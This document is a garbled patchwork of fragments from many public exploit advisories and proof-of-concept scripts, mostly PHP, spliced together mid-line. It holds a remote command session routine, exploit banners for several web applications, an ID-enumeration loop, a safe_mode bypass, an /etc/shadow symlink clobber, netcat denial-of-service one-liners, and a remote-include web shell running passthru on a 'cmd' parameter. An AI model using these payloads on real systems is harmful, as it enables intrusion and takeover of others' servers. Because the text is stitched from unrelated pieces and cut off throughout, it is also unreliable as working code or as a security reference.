if (empty($_POST['phpinfo'] )) {
}else{
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()";
exit;
}
if (isset($_POST['url'])) {
}
/* Starts a remote command session */
function fp_shell($crl, $sh)
{
echo "\nStarting remote command session, type 'quit' or 'exit' to exit.\n";
echo "\nremote> ";
$line = trim(fgets(STDIN));
while (($line != 'exit') && ($line != 'quit')) {
Looking inside the application source code:
###### CUT HERE ######
<style type="text/css">
body {
background-color: #<?php echo( $user_colors[ 'bg_color' ] ); ?>;
color: #<?php echo( $user_colors[ 'txt_color' ] ); ?>;
###### CUT HERE ######
It's easy to see that "user_colors[bg_color]" is not validated and is used directly inside an echo statement.
Sending a trivial HTTP request against PHP environments with register_globals ON makes it possible to exploit this unvalidated user input flaw.
$url = $arguments['a'];
$id_pod =$arguments['b'];
$id_end =$arguments['c'];
if(count($arguments)!=3)
{
echo '## Exploit - EasyITSP by Lemens Telephone Systems 2.0.2 '."\n";
echo '## Discovery users with passwords '."\n";
echo '## '."\n";
echo '## Author: Michal Blaszczak '."\n";
echo '## Website: blaszczakm.blogspot.com '."\n";
echo '## Date: 10.10.2012 '."\n";
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
# FCMS (Family Connections) <= 0.1.1 Remote Command Execution Exploit
# AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com>
# DOWNLOAD:http://sourceforge.net/project/showfiles.php?group_id=189733
# Thanks to rgod for the php code and Ajann for helps
";
The case is one of code equivalent to the following (for example, an online file editor script).
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";' 'ciccio.txt'
ciccio.txt
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";' 'ciccio.php'
$serch_value=$_POST['search_events_by_title']; }else{$serch_value="";}}
..
<input type="text" name="search_events_by_title" value="'.$serch_value.'"
..
<input type="hidden" name="asc_or_desc" id="asc_or_desc"
value="<?php if(isset($_POST['asc_or_desc'])) echo $_POST['asc_or_desc'];?>" />
<input type="hidden" name="order_by" id="order_by"
value="<?php if(isset($_POST['order_by'])) echo $_POST['order_by'];?>" />
------------------------[ source code end ]------------------------------------
Test:
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
> No, but you can upgrade file from read-only to read-write using /proc.
Hmm.
$ cd test
$ echo moo >cow
$ exec 3<cow
$ ll /proc/self/fd
total 0
0 dr-x------ 2 ap users 0 2009-10-29 09:00 .
0 dr-xr-xr-x 7 ap users 0 2009-10-29 09:00 ..
File 'template/ja_purity/index.php' reads data with getParam and writes it directly:
<?php if ($tmpTools->getParam('theme_header') && $tmpTools->getParam('theme_header')!='-1') : ?>
<link rel="stylesheet" href="<?php echo $tmpTools->templateurl(); ?>/styles/header/<?php echo $tmpTools->getParam('theme_header'); ?>/style.css" type="text/css" />
<?php endif; ?>
<?php if ($tmpTools->getParam('theme_background') && $tmpTools->getParam('theme_background')!='-1') : ?>
version:
---cut here---
<?php
if(sizeof($argv)!=4) {
echo "Usage: php5 $argv[0] <router ip address> <port> <admin password>\n";
exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
PHP script "messages.php", line 482:
------------------------[ source code start ]----------------------------------
if ($_GET['msg_send'] == "0") {
echo "<select name='msg_send' class='textbox'>\n".$user_list."</select>\n";
------------------------[ source code end ]------------------------------------
Test:
-------------------------[ test code start ]-----------------------------------
$url = "http://127.0.0.1/index.php?page=cart&action=show";
$max = 1000;
for($customerid = 1; $customerid <= $max; $customerid++)
{
echo "<h3>Customerid: " . $customerid .
"</h3>\n";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, "fws_guest=" . $customerid);
Home : v4-team.com
note : this exploit for education :)
*/
echo "[+] Start...\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){
rem raidenhttpdudo.cmd
@echo off
color 0a
rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit
rem WebAdmin one - not enabled by default anymore
rem however works regardless of php.ini, because
rem "ulang" comes from $_GET[] and some magic_quo
total 24
lrwxrwxrwx 1 larry larry 11 Dec 7 21:48 centrify.cmd.0 -> /etc/shadow
After Analyze/Refresh Computer Information is run:
root@h0g:/tmp ls -l /etc/shadow
-rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow
root@h0g:/tmp cat /etc/shadow
echo 144d823c-9c22-4d21-8446-4e2d07556177
vmware -v 2> /dev/null |grep 'VMware ESX Server' >/dev/null
temp=$?
echo af43ab93-cfce-485e-b16f-0d4331e0e421
exit ${temp}
root@h0g:/tmp ls -l /etc/shadow
-rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow
root@h0g:/tmp
This sucks: we clobber the contents of /etc/shadow and we don't have write permission.
#
# Researched by Andrew Horton (urbanadventurer)
# (c) MorningStar Security, 2009 http://www.morningstarsecurity.com/
if [ -z "$1" ]; then
echo "Usage: $0 <target-url>"
echo "File upload proof of concept exploit for Open Auto Classifieds <= v 1.5.9"
echo "This will create a user with the name 'hacker' and pass '31337' then upload a command execution shell."
echo -e "eg. $0 http://www.myweb.com/cardealer/\n"
Line 225 of file components/com_content/views/article/tmpl/form.php is vulnerable.
221 <input type="hidden" name="option" value="com_content" />
222 <input type="hidden" name="id" value="<?php echo $this->article->id; ?>" />
223 <input type="hidden" name="version" value="<?php echo $this->article->version; ?>" />
224 <input type="hidden" name="created_by" value="<?php echo $this->article->created_by; ?>" />
[=] Technical details:
The dhost.exe process will consume 100% of a CPU. More than one request can be used to lock every CPU.
Two "Connection:" headers: (echo "GET / HTTP/1.0"; echo "Connection: foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028
One "Connection:" header with two values: (echo "GET / HTTP/1.0"; echo "Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028
Vulnerability overview/description:
-----------------------------------
For the purposes of debugging, DataPower provides configuration options to
echo requests received from the client. For example, XML Firewall service can
be configured to echo requests by choosing the backend as 'loopback'. Other
services like Multi Protocol Gateway and Web Service Proxy can be configured
to echo requests by setting the variable “var://service/mpgw/skip-backside” in
its processing policy.
In such configurations, the requests are not sent to a backend server. Without
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>
<body bgcolor="#00000">
/* MyCMS Command Execution
/* This exploit should allow you to execute commands
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
echo('
/**********************************************/
/* MyCmS Command Execution */
/* by HACKERS PAL <security@soqor.net> */
/* site: http://www.soqor.net */');
if ($argc<4) {
- -rw-r--r-- 1 www www 27 Sep 10 03:49 sleep.php
127# cat .htaccess
php_value error_log /etc/
127# cat not.php
<?php
echo "only echo\n";
?>
127# cat pufff.php
<?php
echo "safe_mode=".ini_get("safe_mode")."\n";
echo "error_log=".ini_get("error_log")."\n";
On line 353 in googleanalytics.php the following vulnerable code was identified:
/**
* If this is a 404 page, track the 404 and prevent all other stuff as it's not needed.
*/
if ( is_404() ) {
echo "\t\t".'pageTracker._trackPageview("/404.html?page=" + document.location.pathname + document.location.search + "&from=" + document.referrer);'."\n";
echo "\t".'} catch(err) {}'."\n";
echo '</script>'."\n";
} else if ($wp_query->is_search && $wp_query->found_posts == 0) {
echo "\t\t".'pageTracker._trackPageview("'.get_bloginfo('url').'/?s=no-results: '.$wp_query->query_vars['s'].'&cat=no-results");'."\n";
echo "\t".'} catch(err) {}'."\n";
One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.
curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
B) "Varnish" log escape sequence injection
One of the following two Proofs Of Concept can be used in order to
-- cut --
#!/bin/sh
if [ -z $1 ] || [ -z $2 ]; then
echo "$0 addr file"
exit
fi
echo "--+ Arbitrary File Download PoC for Sourcefire 3D Defense Center < 4.10.2.3 +--"
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 10);
ob_implicit_flush (1);
echo'<html>
<head>
<title>PHP CGI Argument Injection Remote Exploit</title>
</head>
<p align="center"><font size="4" color="#5E767E">PHP CGI Argument
Injection</font></p>
Possible issues with files in /tmp.
root@dev-unix-sec01:~/test# strings SUNWswasr-4.3.1-20130117131218.rpm |grep tmp
##Read the contents of crontab into a tmp file
/usr/bin/crontab -l > /tmp/crontab_edit
echo "0" > /tmp/tmpVariable
grep "/opt/SUNWswasr/bin/update_rules.sh" /tmp/crontab_edit |
echo "1" > /tmp/tmpVariable
grep "0" /tmp/tmpVariable > /dev/null
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"iLker Kandemir www.mefistolabs.com";ini_set("max_execution_time",0);echo "mefistolabs";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}